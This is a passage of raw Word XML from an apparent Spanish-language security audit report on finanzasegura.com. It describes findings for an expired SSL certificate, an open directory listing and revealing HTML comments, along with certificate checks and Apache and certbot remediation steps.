              <w:t>️</w:t>
            </w:r>
            <w:r w:rsidRPr="00073C53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #8:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Certificado SSL expirado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D21A754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rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1D2480" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00073C53" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Dominio: </w:t>
            </w:r>
            <w:r w:rsidRPr="00073C53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>test.finanzasegura.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0DF3F4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CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="00073C53">
              <w:t>6.5 (ALTA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E54ACFB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117D151E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069FE429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El certificado SSL del subdominio de pruebas expiró </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F00BE94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hace 6 meses, mostrando advertencia de seguridad.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A9C0AC3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F5589E4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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F97F2BA" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ openssl s_client -connect test.finanzasegura.com:443</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4347AFFF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3037AF17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 xml:space="preserve">Verify return code: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10 (certificate has expired)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6344DCF2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 xml:space="preserve">Not After : </w:t>
            </w:r>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Apr 15 23:59:59 2024 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63DD16B7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33BD4C6A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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0029417F" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>- Advertencias de seguridad en navegadores</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49C26773" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>- Pérdida de confianza del usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4207771A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>- Vulnerable a ataques Man-in-the-Middle (MITM)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3370FDE2" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>- Incumplimiento de normativas PCI-DSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C88DFD" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>- Tráfico puede ser interceptado y descifrado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78FBCFF0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F6530C2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ecomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="180C6503" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>1. Renovar certificado SSL inmediatamente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8BD22C" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>2. Implementar monitoreo de expiración de certificados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450AB0A9" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>3. Usar Let's Encrypt con renovación automática</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46281298" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>4. Configurar alertas 30 días antes de expiración</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5E2AD6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:t>5. Si no se usa, eliminar el subdominio test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599E1082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1FEC30FB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Comando para renovación (Let's Encrypt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="431FDA49" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>certbot renew --dry-run</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3805F8D6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>certbot certonly --webroot -w /var/www/html \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58280D2C" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00A70DBA">
              <w:t>-d test.finanzasegura.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138E2C40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0444FDE" w14:textId="77777777" w:rsidR="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28BCF5DB" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A63D5F4" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15AC2AD0" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72C008DF" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="327FD963" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="008E473A" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="134A0F3E" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="378CAEF8" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31FAF70E" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7256A3CA" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FA4562C" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46605321" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6079C304" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F2AF618" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0744BEF5" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0ACE5C2F" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5ACD2560" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59E7D0AF" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="343F4250" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A9D3CBF" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DB4AC92" w14:textId="77777777" w:rsidR="00A70DBA" w:rsidRPr="007C4494" w:rsidRDefault="00A70DBA" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67B8CF76" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4. VULNERABILIDADES MEDIAS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37FBDD93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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="547025F8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D6D8590" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>🔸</w:t>
            </w:r>
            <w:r w:rsidRPr="00A70DBA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #9:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A70DBA">
              <w:t>Directory Listing habilitado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA9E9C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━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A7AA342" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ubicación: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A70DBA">
              <w:t>test.finanzasegura.com/uploads/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DD5C948" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A70DBA" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A70DBA">
              <w:t>5.3 (MEDIA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D97B2BD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7FB0BF91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3AB225BF" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t xml:space="preserve">El directorio de archivos subidos permite listar su </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F5EE4D4" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>contenido, exponiendo archivos potencialmente sensibles.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="567D8E0D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29BF7E49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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325C9023" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>URL: test.finanzasegura.com/uploads/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24124B7C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CE6936F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Archivos expuestos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B2FCC9" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>- documento_confidencial_clientes.xlsx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4198A7C6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>- backup_database_2024.sql</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18694155" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>- passwords.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18FC0AA9" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>- configuracion_servidor.pdf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1831B264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45955442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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CCE4F15" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>- Exposición de información sensible</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61BC89B5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>- Descarga de backups de base de datos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18FBBD9F" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>- Acceso a documentos internos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA64093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10809A3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ecomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C66A1F0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>1. Deshabilitar directory listing en Apache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="585F20FE" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>2. Implementar autenticación en directorio uploads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5481A1F0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE14F8" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE14F8">
              <w:t>3. Mover archivos sensibles fuera del webroot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C2E6316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A9BEFDF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Configuración Apache:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B4E36A5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="000E3349" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="000E3349">
              <w:t>&lt;Directory /var/www/html/uploads&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029342B8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="000E3349" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E3349">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000E3349">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Options -Indexes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66733A2C" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="000E3349" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E3349">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    Require all denied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D8BA611" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="000E3349" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E3349">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;/Directory&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216EC33A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DA488FB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2F114CF5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45676A54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2A353EA9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5375C1AA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1D8FF80D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25DBA8CD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2D5FC903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362371EE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26807776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586FD0B4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0D706929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21B65590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0D68DB2E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2E6C3DA1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52F6E734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4B211FAB" w14:textId="77777777" w:rsidR="000E3349" w:rsidRPr="00C35C7D" w:rsidRDefault="000E3349" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="257E8F90" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00C35C7D" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03564CA0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E3349">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>🔸</w:t>
            </w:r>
            <w:r w:rsidRPr="000E3349">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #10:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000E3349">
              <w:t>Información sensible en código fuente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20C64A47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━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721C4973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Ubicación: </w:t>
            </w:r>
            <w:r w:rsidRPr="000E3349">
              <w:t>Múltiples páginas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="423AC1CE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CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="000E3349">
              <w:t>5.0 (MEDIA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6329CD9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5C0AD7C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5BCC5E83" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E4073B" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E4073B">
              <w:t xml:space="preserve">Comentarios HTML revelan información sobre la </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A52BA14" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E4073B" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E4073B">
              <w:t>infraestructura y versiones de software utilizadas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B9801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1739846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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AA56575" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E4073B" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E4073B">
              <w:t>&lt;!-- TODO: Cambiar usuario de BD de 'root' --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="463223E7" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E4073B" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E4073B">
              <w:t>&lt;!-- Servidor: srv-prod-db-01.internal --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C983787" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E4073B" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E4073B">
              <w:t>&lt;!-- Framework: Laravel 5.5 con vulnerabilidad conocida --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4696EB04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26C2E267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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D745D1E" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009B411E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009B411E">
              <w:t>- Información útil para atacantes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1424F742" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009B411E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009B411E">
              <w:t>- Revelación de estructura interna</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692E4AA8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009B411E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009B411E">
              <w:t>- Facilita reconocimiento para ataques dirigidos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FF30B43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1A03E953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ecomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="231AE2C8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009B411E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009B411E">
              <w:t>1. Remover todos los comentarios de producción</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="597ACD06" w14:textId="04D2B681" w:rsidR="007C4494" w:rsidRPr="009B411E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009B411E">
              <w:t xml:space="preserve">2. Implementar </w:t>
            </w:r>
            <w:r w:rsidR="00A04FDC" w:rsidRPr="009B411E">
              <w:t>mitificación</w:t>
            </w:r>
            <w:r w:rsidRPr="009B411E">
              <w:t xml:space="preserve"> de código</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2D4582" w14:textId="67FBDE00" w:rsidR="007C4494" w:rsidRPr="00A04FDC" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009B411E">
              <w:t>3. Usar variables de entorno para configuración</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C897D6" w14:textId="0A75E5C1" w:rsidR="00A04FDC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━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6265E0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
